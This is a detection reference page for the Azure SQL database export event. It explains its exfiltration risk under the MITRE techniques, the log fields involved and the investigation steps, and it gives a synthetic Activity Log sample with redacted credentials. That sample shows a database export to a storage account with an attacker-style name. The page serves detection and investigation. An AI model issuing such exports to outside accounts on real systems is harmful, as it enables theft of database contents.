Skip to content

Microsoft.Sql/servers/databases/export/action

Azure

Microsoft.Sql/servers/databases/export/action

service: Azure - Azure SQL
techniques:

Event

Initiates an asynchronous export. A BACPAC contains database schema and data; it is not a transactional backup or transaction-log archive. Valid database/storage authorization and service connectivity are required. For transactional consistency, Microsoft recommends no writes during export or exporting a transactionally consistent database copy.

Security Context

Unauthorized export can collect database contents (T1213.006). Transfer to an adversary-controlled cloud account can additionally support T1537, but destination ownership and completed transfer must be established. HTTP 202 proves acceptance, not a completed artifact or download.

Log Source

Azure Activity Log, Administrative category, with operationName.value: Microsoft.Sql/servers/databases/export/action. Correlate status, subStatus, and final resource state; accepted asynchronous requests may still fail. Request bodies and HTTP details are optional and export-dependent.

Key Fields

FieldInvestigation value
caller, claims, authorizationRecorded actor and authorization context; verify effective permissions.
resourceId, correlationIdExact target and related operations.
status, subStatusOutcome, including acceptance versus final completion.
properties.requestbody, httpRequestSubmitted configuration or request URL where available; secret material may be omitted.

What to Investigate

  1. Confirm the recorded outcome and compare actor, target, and timing with the approved workflow.
  2. Verify export approval, database access, storage authorization type, destination ownership, and network configuration.
  3. Follow the export operation to completion and confirm the resulting blob and data scope without exposing secrets.
  4. Correlate destination reads and actual transfer; distinguish portable export from complete backup/recovery coverage.

Sample Event

Synthetic scenario. The request illustrates a SAS-authorized BACPAC destination with credentials replaced by placeholders. It is not executable as written. The hostname does not prove attacker ownership; the accepted response does not prove export completion.

Exact field presence, payload nesting, identity/session details, and timestamp formatting remain unverified against captured logs. Names and illustrative identifiers do not prove intent or downstream activity.

{
"authorization": {
"action": "Microsoft.Sql/servers/databases/export/action",
"scope": "/subscriptions/20000000-0000-4000-8000-000000000001/resourceGroups/rg-occamy-pipeline/providers/Microsoft.Sql/servers/sql-occamy-prod-server/databases/sqldb-occamy-events"
},
"caller": "draco@fantasticlogs.cloud",
"channels": "Operation",
"claims": {
"appid": "04b07795-8ddb-461a-bbee-02f9e1bf7b46",
"ipaddr": "203.0.113.66",
"name": "Draco Malfoy",
"http://schemas.microsoft.com/identity/claims/objectidentifier": "30000000-0000-4000-8000-001010011010",
"puid": "1003200000000666",
"http://schemas.microsoft.com/identity/claims/tenantid": "10000000-0000-4000-8000-000000000001",
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn": "draco@fantasticlogs.cloud",
"http://schemas.microsoft.com/identity/claims/wids": "e8611ab8-c189-46e8-94e1-60213ab1f814",
"uti": "sqlExp221ExampleUtid01",
"ver": "1.0"
},
"correlationId": "90000000-0000-4000-8000-000100010000",
"description": "",
"eventDataId": "90000000-0000-4000-8000-000100010001",
"eventName": {
"value": "EndRequest",
"localizedValue": "End request"
},
"category": {
"value": "Administrative",
"localizedValue": "Administrative"
},
"eventTimestamp": "2026-04-15T18:46:11.7218012Z",
"level": "Informational",
"operationId": "90000000-0000-4000-8000-000100110101",
"operationName": {
"value": "Microsoft.Sql/servers/databases/export/action",
"localizedValue": "Export SQL Database"
},
"resourceGroupName": "rg-occamy-pipeline",
"resourceProviderName": {
"value": "Microsoft.Sql",
"localizedValue": "Microsoft.Sql"
},
"resourceType": {
"value": "Microsoft.Sql/servers/databases",
"localizedValue": "Microsoft.Sql/servers/databases"
},
"resourceId": "/subscriptions/20000000-0000-4000-8000-000000000001/resourceGroups/rg-occamy-pipeline/providers/Microsoft.Sql/servers/sql-occamy-prod-server/databases/sqldb-occamy-events",
"status": {
"value": "Accepted",
"localizedValue": "Accepted"
},
"subStatus": {
"value": "Accepted",
"localizedValue": "Accepted (HTTP Status Code: 202)"
},
"submissionTimestamp": "2026-04-15T18:46:12.2402185Z",
"subscriptionId": "20000000-0000-4000-8000-000000000001",
"tenantId": "10000000-0000-4000-8000-000000000001",
"properties": {
"statusCode": "Accepted",
"serviceRequestId": null,
"eventCategory": "Administrative",
"entity": "/subscriptions/20000000-0000-4000-8000-000000000001/resourceGroups/rg-occamy-pipeline/providers/Microsoft.Sql/servers/sql-occamy-prod-server/databases/sqldb-occamy-events/export",
"message": "Microsoft.Sql/servers/databases/export/action",
"hierarchy": "10000000-0000-4000-8000-000000000001/20000000-0000-4000-8000-000000000001",
"requestbody": "{\"storageKeyType\":\"SharedAccessKey\",\"storageKey\":\"<REDACTED-SAS-TOKEN>\",\"storageUri\":\"https://flcdracoexfil666.blob.core.windows.net/exfil/sqldb-occamy-events.bacpac\",\"administratorLogin\":\"flcadmin\",\"administratorLoginPassword\":\"<REDACTED-PASSWORD>\",\"authenticationType\":\"SQL\"}"
},
"relatedEvents": []
}

Sources

MITRE ATT&CK Mapping

Tactics: Collection Exfiltration

Techniques:
  • T1213.006 — Databases — Adversaries may leverage databases to mine valuable information. These databases may be hosted on-premises or in the cloud (both in platform-as-a-service and software-as-a-service environments).
  • T1537 — Transfer Data to Cloud Account — Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.
Documentation reviewed: October 5, 2026. Samples are synthetic illustrations, not captured production logs or lab-validated fixtures.